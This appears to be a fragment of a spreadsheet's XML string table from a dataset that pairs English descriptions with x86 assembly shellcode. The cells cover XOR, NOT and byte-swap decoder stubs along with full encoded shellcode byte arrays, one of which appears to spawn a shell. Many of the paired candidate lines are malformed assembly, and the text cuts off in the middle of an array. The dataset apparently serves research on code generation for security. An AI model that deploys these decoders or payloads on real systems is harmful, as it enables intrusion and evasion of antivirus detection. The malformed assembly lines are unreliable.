    <t>pop edi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov var2 , edi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl, byte [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">dec bl </t>
  </si>
  <si>
    <t>mov var1 , byte [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">xor bl, 0xbb </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">jz formatting </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl, byte [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz mov cl , 0xbb</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor cl, 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz shift_decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor cl , 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz short var2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz encoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor bl, 0xbb</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor bl , 0xbb</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jnz next_cycle</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz next_cycle</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor dl, 0xbb</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">next_cycle: </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">inc edi </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short formatting</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>next_cycle :</t>
  </si>
  <si>
    <t>_start label</t>
  </si>
  <si>
    <t>zero out eax, ebx, ecx and edx</t>
  </si>
  <si>
    <t>move 0x45 to dl</t>
  </si>
  <si>
    <t>mov dl, 0x45</t>
  </si>
  <si>
    <t>'mov dl , 0x45'</t>
  </si>
  <si>
    <t>jump short to call_decoder</t>
  </si>
  <si>
    <t>point edi to the start of the shellcode</t>
  </si>
  <si>
    <t>move the byte at the address edi+ecx into bl</t>
  </si>
  <si>
    <t>mov bl, byte [edi + ecx]</t>
  </si>
  <si>
    <t>'mov bl , byte [edi+ecx]'</t>
  </si>
  <si>
    <t>move the contents of bl into bh</t>
  </si>
  <si>
    <t>mov bh, bl</t>
  </si>
  <si>
    <t>'mov bh , bl'</t>
  </si>
  <si>
    <t>move dl to al</t>
  </si>
  <si>
    <t>mov al, dl</t>
  </si>
  <si>
    <t>'mov al , dl'</t>
  </si>
  <si>
    <t>perform xor between al and bl and jump short to shellcode if the result is zero</t>
  </si>
  <si>
    <t>mov the word at the address edi+1+ecx into ax</t>
  </si>
  <si>
    <t>mov ax, word [edi + 1 + ecx]</t>
  </si>
  <si>
    <t>edi+1+ecx : dw edi+1+ecx</t>
  </si>
  <si>
    <t>perform xor between ax and bx</t>
  </si>
  <si>
    <t>xor ax, bx</t>
  </si>
  <si>
    <t>'xor ax , bx'</t>
  </si>
  <si>
    <t>move ax into the word in edi</t>
  </si>
  <si>
    <t>mov word [edi], ax</t>
  </si>
  <si>
    <t>'mov edi , word ax'</t>
  </si>
  <si>
    <t>point to the next byte in ecx</t>
  </si>
  <si>
    <t>load the address of edi+2 into edi</t>
  </si>
  <si>
    <t>lea edi, [edi + 2]</t>
  </si>
  <si>
    <t>'lea edi , [edi+2]'</t>
  </si>
  <si>
    <t>call_decoder label</t>
  </si>
  <si>
    <t>shellcode contains the bytes 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4</t>
  </si>
  <si>
    <t>shellcode: db 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4</t>
  </si>
  <si>
    <t>'test 0x31 , 0xc0 , 0x31 , 0xdb , 0x31 , 0xc9 , 0x31 , 0xd2 , 0xb2 , 0xa4 , 0xeb , 0x1f , 0x5e , 0x8d , 0x3e , 0x8a , 0x1c , 0x0f , 0x88 , 0xdf , 0x88 , 0xd0 , 0x30 , 0xd8 , 0x74 , 0x16 , 0x66 , 0x8b , 0x44 , 0x0f , 0x01 , 0x66 , 0x31 , 0xd8 , 0x66 , 0x89 , 0x07 , 0x41 , 0x8d , 0x7f , 0x02 , 0xeb , 0xe4 , 0xe8 , 0xdc , 0xff , 0xff , 0xff , 0x7d , 0x4c , 0xa6 , 0x09 , 0xfe , 0xea , 0xd8 , 0x8b , 0x9b , 0x0c , 0x5f , 0x66 , 0x30 , 0x32 , 0xb9 , 0x07 , 0xe6 , 0xb7 , 0x0f , 0x69 , 0xc2 , 0xab , 0x2b , 0xf0 , 0x3e , 0x60 , 0x6c , 0xea , 0x82 , 0xe8 , 0x63 , 0x63 , 0x72 , 0x68 , 0x34 , 0x02 , 0xeb , 0xfb , 0xba , 0xef , 0xbf , 0x66 , 0xf4 , 0x15 , 0x9e , 0xbb , 0xdd , 0xe3 , 0x73 , 0xbe , 0xf3 , 0xbb , 0x32 , 0xfa , 0xeb , 0xef , 0x58 , 0x20 , 0x24 , 0x90 , 0xe3 , 0x85 , 0x2e , 0x64 , 0xe4 , 0x27 , 0x59 , 0xe9 , 0x3f , 0xee , 0x23 , 0x6e , 0x63 , 0xf0 , 0x3a , 0x47 , 0x2d , 0x78 , 0x68 , 0x30 , 0xa5 , 0x66 , 0xe6 , 0x2f , 0x69 , 0x10 , 0x91 , 0xfa , 0x92 , 0xd5 , 0x3e , 0x11 , 0x4d , 0xf4 , 0x9c , 0x9c , 0x16 , 0x39 , 0x74 , 0xa0 , 0xc9 , 0xce , 0xd2 , 0x5b , 0x31 , 0x5c , 0x0c , 0x0f , 0xfb , 0x72 , 0x1a , 0xb6 , 0x06 , 0xbd , 0xd1 , 0x1c , 0x51 , 0xa4 , 0x31 , 0xc0 , 0x31 , 0xdb , 0x31 , 0xc9 , 0x31 , 0xd2 , 0xb2 , 0xa4 , 0xeb , 0x1f , 0x5e , 0x8d , 0x3e , 0x8a , 0x1c , 0x0f , 0x88 , 0xdf , 0x88 , 0xd0 , 0x30 , 0xd8 , 0x74 , 0x16 , 0x66 , 0x8b , 0x44 , 0x0f , 0x01 , 0x66 , 0x31 , 0xd8 , 0x66 , 0x89 , 0x07 , 0x41 , 0x8d , 0x7f , 0x02 , 0xeb , 0xe4 , 0xe8 , 0xdc , 0xff , 0xff , 0xff , 0x7d , 0x4c , 0xa6 , 0x09 , 0xfe , 0xea , 0xd8 , 0x8b , 0x9b , 0x0c , 0x5f , 0x66 , 0x30 , 0x32 , 0xb9 , 0x07 , 0xe6 , 0xb7 , 0x0f , 0x69 , 0xc2 , 0xab , 0x2b , 0xf0 , 0x3e , 0x60 , 0x6c , 0xea , 0x82 , 0xe8 , 0x63 , 0x63 , 0x72 , 0x68 , 0x34 , 0x02 , 0xeb , 0xfb , 0xba , 0xef , 0xbf , 0x66 , 0xf4 , 0x15 , 0x9e , 0xbb , 0xdd , 0xe3 , 0x73 , 0xbe , 0xf3 , 0xbb , 0x32 , 0xfa , 0xeb , 0xef , 0x58 , 0x20 , 0x24 , 0x90 , 0xe3 , 0x85 , 0x2e , 0x64 , 0xe4 , 0x27 , 0x59 , 0xe9 , 0x3f , 0xee , 0x23 , 0x6e , 0x63 , 0xf0 , 0x3a , 0x47 , 0x2d , 0x78 , 0x68 , 0x30 , 0xa5 , 0x66 , 0xe6 , 0x2f , 0x69 , 0x10 , 0x91 , 0xfa , 0x92 , 0xd5 , 0x3e , 0x11 , 0x4d , 0xf4 , 0x9c , 0x9c , 0x16 , 0x39 , 0x74 , 0xa0 , 0xc9 , 0xce , 0xd2 , 0x5b , 0x31 , 0x5c , 0x0c , 0x0f , 0xfb , 0x72 , 0x1a , 0xb6 , 0x06 , 0xbd , 0xd1 , 0x1c , 0x51 , 0xa4'</t>
  </si>
  <si>
    <t>mov dl , 0x45</t>
  </si>
  <si>
    <t>mov bl , byte [edi+ecx]</t>
  </si>
  <si>
    <t>mov var1 , bl</t>
  </si>
  <si>
    <t>mov al , dl</t>
  </si>
  <si>
    <t>mov ax , word [edi+1+ecx]</t>
  </si>
  <si>
    <t>xor ax , bx</t>
  </si>
  <si>
    <t>mov word [edi] , ax</t>
  </si>
  <si>
    <t>lea var1 , [edi+2]</t>
  </si>
  <si>
    <t>call var0</t>
  </si>
  <si>
    <t>0x31 , 0xc0 , 0x31 , 0xdb , 0x31 , 0xc9 , 0x31 , 0xd2 , 0xb2 , 0xa4 , 0xeb , 0x1f , 0x5e , 0x8d , 0x3e , 0x8a , 0x1c , 0x0f , 0x88 , 0xdf , 0x88 , 0xd0 , 0x30 , 0xd8 , 0x74 , 0x16 , 0x66 , 0x8b , 0x44 , 0x0f , 0x01 , 0x66 , 0x31 , 0xd8 , 0x66 , 0x89 , 0x07 , 0x41 , 0x8d , 0x7f , 0x02 , 0xeb , 0xe4 , 0xe8 , 0xdc , 0xff , 0xff , 0xff , 0x7d , 0x4c , 0xa6 , 0x09 , 0xfe , 0xea , 0xd8 , 0x8b , 0x9b , 0x0c , 0x5f , 0x66 , 0x30 , 0x32 , 0xb9 , 0x07 , 0xe6 , 0xb7 , 0x0f , 0x69 , 0xc2 , 0xab , 0x2b , 0xf0 , 0x3e , 0x60 , 0x6c , 0xea , 0x82 , 0xe8 , 0x63 , 0x63 , 0x72 , 0x68 , 0x34 , 0x02 , 0xeb , 0xfb , 0xba , 0xef , 0xbf , 0x66 , 0xf4 , 0x15 , 0x9e , 0xbb , 0xdd , 0xe3 , 0x73 , 0xbe , 0xf3 , 0xbb , 0x32 , 0xfa , 0xeb , 0xef , 0x58 , 0x20 , 0x24 , 0x90 , 0xe3 , 0x85 , 0x2e , 0x64 , 0xe4 , 0x27 , 0x59 , 0xe9 , 0x3f , 0xee , 0x23 , 0x6e , 0x63 , 0xf0 , 0x3a , 0x47 , 0x2d , 0x78 , 0x68 , 0x30 , 0xa5 , 0x66 , 0xe6 , 0x2f , 0x69 , 0x10 , 0x91 , 0xfa , 0x92 , 0xd5 , 0x3e , 0x11 , 0x4d , 0xf4 , 0x9c , 0x9c , 0x16 , 0x39 , 0x74 , 0xa0 , 0xc9 , 0xce , 0xd2 , 0x5b , 0x31 , 0x5c , 0x0c , 0x0f , 0xfb , 0x72 , 0x1a , 0xb6 , 0x06 , 0xbd , 0xd1 , 0x1c , 0x51 , 0xa4 : db var1</t>
  </si>
  <si>
    <t>xor eax, eax</t>
  </si>
  <si>
    <t>xor al, bl</t>
  </si>
  <si>
    <t>jz short shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz short bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>_start</t>
  </si>
  <si>
    <t>'mov eax , 106'</t>
  </si>
  <si>
    <t>go to shellcode_section</t>
  </si>
  <si>
    <t>jmp short shellcode_section</t>
  </si>
  <si>
    <t>decoder's main</t>
  </si>
  <si>
    <t>pop the address of the encoded shellcode into esi</t>
  </si>
  <si>
    <t>move 10 into the first byte of the counter</t>
  </si>
  <si>
    <t>mov cl, 10</t>
  </si>
  <si>
    <t>mov byte 10</t>
  </si>
  <si>
    <t>decode_loop</t>
  </si>
  <si>
    <t>decode_loop:</t>
  </si>
  <si>
    <t>load the byte pointed by esi in al</t>
  </si>
  <si>
    <t>swap al value with next byte value (esi+1)</t>
  </si>
  <si>
    <t>xchg byte [esi+1], al</t>
  </si>
  <si>
    <t>'xor al , var1'</t>
  </si>
  <si>
    <t>add 2 to the contents of esi</t>
  </si>
  <si>
    <t>add esi, 2</t>
  </si>
  <si>
    <t>'add esi , 2'</t>
  </si>
  <si>
    <t>decrement the counter and if it is not zero go back at decode_loop and execute the cicle again else jump to encoded_shellcode</t>
  </si>
  <si>
    <t>in shellcode_section go to decoder's main</t>
  </si>
  <si>
    <t>encoded_shellcode is an array of bytes 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80</t>
  </si>
  <si>
    <t>encoded_shellcode: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80</t>
  </si>
  <si>
    <t>'encoded_shellcode : db 0xc0 , 0x31 , 0x68 , 0x50 , 0x2f , 0x2f , 0x68 , 0x73 , 0x2f , 0x68 , 0x69 , 0x62 , 0x87 , 0x6e , 0xb0 , 0xe3 , 0xcd , 0x0b , 0x90 , 0x80'</t>
  </si>
  <si>
    <t>mov eax , _start</t>
  </si>
  <si>
    <t>jmp shellcode_section</t>
  </si>
  <si>
    <t>mov byte cl , 10</t>
  </si>
  <si>
    <t>decode_loop :</t>
  </si>
  <si>
    <t>lea al , byte [esi]</t>
  </si>
  <si>
    <t>xchg al , [esi+1]</t>
  </si>
  <si>
    <t>add esi , 2</t>
  </si>
  <si>
    <t>encoded_shellcode : db 0xc0 , 0x31 , 0x68 , 0x50 , 0x2f , 0x2f , 0x68 , 0x73 , 0x2f , 0x68 , 0x69 , 0x62 , 0x87 , 0x6e , 0xb0 , 0xe3 , 0xcd , 0x0b , 0x90 , 0x80 , 0x2f , 0x68 , 0x69 , 0x62 , 0x87 , 0x6e , 0xb0 , 0xe3 , 0xcd , 0x0b , 0x90 , 0x80</t>
  </si>
  <si>
    <t>jmp short encoded_shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop decode_loop</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop encoded_shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp decode_loop</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jnz encoded_shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode_section</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>go to call_shellcode</t>
  </si>
  <si>
    <t>clear eax, ebx, ecx and edx registers</t>
  </si>
  <si>
    <t>store the address of the shellcode in esi</t>
  </si>
  <si>
    <t>move 0xaaaa9090 to edi</t>
  </si>
  <si>
    <t>mov edi, 0xaaaa9090</t>
  </si>
  <si>
    <t>subtract 0x7f from the stack</t>
  </si>
  <si>
    <t>sub esp, 0x7f</t>
  </si>
  <si>
    <t>subtract 0x7f from esp</t>
  </si>
  <si>
    <t>save the byte in esi+edx+1 in bl</t>
  </si>
  <si>
    <t>mov bl, byte [esi + edx + 1]</t>
  </si>
  <si>
    <t>save the byte in esi+edx+2 in bh</t>
  </si>
  <si>
    <t>mov bh, byte [esi + edx + 2]</t>
  </si>
  <si>
    <t>save the byte in esi+edx+3 in cl</t>
  </si>
  <si>
    <t>mov cl, byte [esi + edx + 3]</t>
  </si>
  <si>
    <t>save the byte in esi+edx+4 in ch</t>
  </si>
  <si>
    <t>mov ch, byte [esi + edx + 4]</t>
  </si>
  <si>
    <t>perform the xor between bl and the byte in esi+edx</t>
  </si>
  <si>
    <t>xor bl, byte [esi + edx]</t>
  </si>
  <si>
    <t>perform the xor between bh and the byte in esi+edx</t>
  </si>
  <si>
    <t>xor bh, byte [esi + edx]</t>
  </si>
  <si>
    <t>perform the xor between cl and the byte in esi+edx</t>
  </si>
  <si>
    <t>xor cl, byte [esi + edx]</t>
  </si>
  <si>
    <t>perform the xor between ch and the byte in esi+edx</t>
  </si>
  <si>
    <t>xor ch, byte [esi + edx]</t>
  </si>
  <si>
    <t>move ch into the byte in esp+eax</t>
  </si>
  <si>
    <t>mov byte [esp + eax], ch</t>
  </si>
  <si>
    <t>move cl into the byte in esp+eax+1</t>
  </si>
  <si>
    <t>mov byte [esp + eax + 1], cl</t>
  </si>
  <si>
    <t>move bh into the byte in esp+eax+2</t>
  </si>
  <si>
    <t>mov byte [esp + eax + 2], bh</t>
  </si>
  <si>
    <t>move bl into the byte in esp+eax+3</t>
  </si>
  <si>
    <t>mov byte [esp + eax + 3], bl</t>
  </si>
  <si>
    <t>jump to execute_shellcode if the doubleword in esi+edx+5 is equal to edi</t>
  </si>
  <si>
    <t>point to the next double word in edx</t>
  </si>
  <si>
    <t>point to the next byte in edx</t>
  </si>
  <si>
    <t>inc edx</t>
  </si>
  <si>
    <t>add 4 to eax and jump to decode if the result is not zero</t>
  </si>
  <si>
    <t>in execute_shellcode jump short to esp</t>
  </si>
  <si>
    <t>in call_shellcode execute the decoder routine</t>
  </si>
  <si>
    <t>encoder_shellcode is the array of bytes 0x08,0x60,0x58,0xc8,0x39,0xb0,0xd8,0xc3,0x9f,0x9f,0xd1,0xb8,0xb3,0xfe,0xb9,0x1e,0x4e,0xfd,0x97,0x70,0x39,0xb0,0x6a,0xdb,0xb0,0xc4,0x09,0xcf,0x74,0x25,0x76,0xe6,0xe6,0xe6,0xf6,0x90,0x90,0xaa,0xaa</t>
  </si>
  <si>
    <t>encoder_shellcode: db 0x08,0x60,0x58,0xc8,0x39,0xb0,0xd8,0xc3,0x9f,0x9f,0xd1,0xb8,0xb3,0xfe,0xb9,0x1e,0x4e,0xfd,0x97,0x70,0x39,0xb0,0x6a,0xdb,0xb0,0xc4,0x09,0xcf,0x74,0x25,0x76,0xe6,0xe6,0xe6,0xf6,0x90,0x90,0xaa,0xaa</t>
  </si>
  <si>
    <t>mov call_shellcode , var1</t>
  </si>
  <si>
    <t>mov edi , 0xaaaa9090</t>
  </si>
  <si>
    <t>sub 0x7f , var1</t>
  </si>
  <si>
    <t>sub esp , 0x7f</t>
  </si>
  <si>
    <t>mov bl , byte [esi+edx+1]</t>
  </si>
  <si>
    <t>mov cl , byte [esi+edx+3]</t>
  </si>
  <si>
    <t>mov byte [ch] , esi+edx+4</t>
  </si>
  <si>
    <t>mov byte [esp+eax] , ch</t>
  </si>
  <si>
    <t>mov byte [esp+eax+2] , bh</t>
  </si>
  <si>
    <t>mov byte [esp+eax+3] , bl</t>
  </si>
  <si>
    <t>encoder_shellcode : db 0x08 , 0x60 , 0x58 , 0xc8 , 0x39 , 0xb0 , 0xd8 , 0xc3 , 0x9f , 0x9f , 0xd1 , 0xb8 , 0xb3 , 0xfe , 0xb9 , 0x1e , 0x4e , 0xfd , 0x97 , 0x70 , 0x39 , 0xb0 , 0x6a , 0xdb , 0xb0 , 0xc4 , 0x09 , 0xcf , 0x74 , 0x25 , 0x76 , 0xe6 , 0xe6 , 0xe6 , 0xf6 , 0x90 , 0x90 , 0xaa , 0xaa</t>
  </si>
  <si>
    <t xml:space="preserve">cmp dword [esi + edx + 5], edi </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz execute_shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">cmp dword [execute_shellcode] , esi+edx+5 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">inc edx </t>
  </si>
  <si>
    <t xml:space="preserve">inc edx </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>inc edx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jnz decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>add eax, 4</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>execute_shellcode:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jump short to call_shellcode</t>
  </si>
  <si>
    <t>decoder_setup label</t>
  </si>
  <si>
    <t>decoder_setup:</t>
  </si>
  <si>
    <t>jump to shellcode label if the byte in esi is equal to 0x88</t>
  </si>
  <si>
    <t>not operation of current byte in esi</t>
  </si>
  <si>
    <t>not byte [ esi ]</t>
  </si>
  <si>
    <t>add 0x02 to the current byte in esi</t>
  </si>
  <si>
    <t>add byte [esi], 0x02</t>
  </si>
  <si>
    <t>xor between current byte in esi and 0x97</t>
  </si>
  <si>
    <t>xor byte [esi], 0x97</t>
  </si>
  <si>
    <t>add 0x10 to the current byte in esi</t>
  </si>
  <si>
    <t>add byte [esi], 0x10</t>
  </si>
  <si>
    <t>xor between the current byte in esi and 0x88</t>
  </si>
  <si>
    <t>xor byte [esi], 0x88</t>
  </si>
  <si>
    <t>move to next byte in esi</t>
  </si>
  <si>
    <t>jump back to start of decode</t>
  </si>
  <si>
    <t>call_shellcode function</t>
  </si>
  <si>
    <t>call decoder_setup</t>
  </si>
  <si>
    <t>define shellcode as the array of bytes 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xce,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88</t>
  </si>
  <si>
    <t>shellcode: db 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xc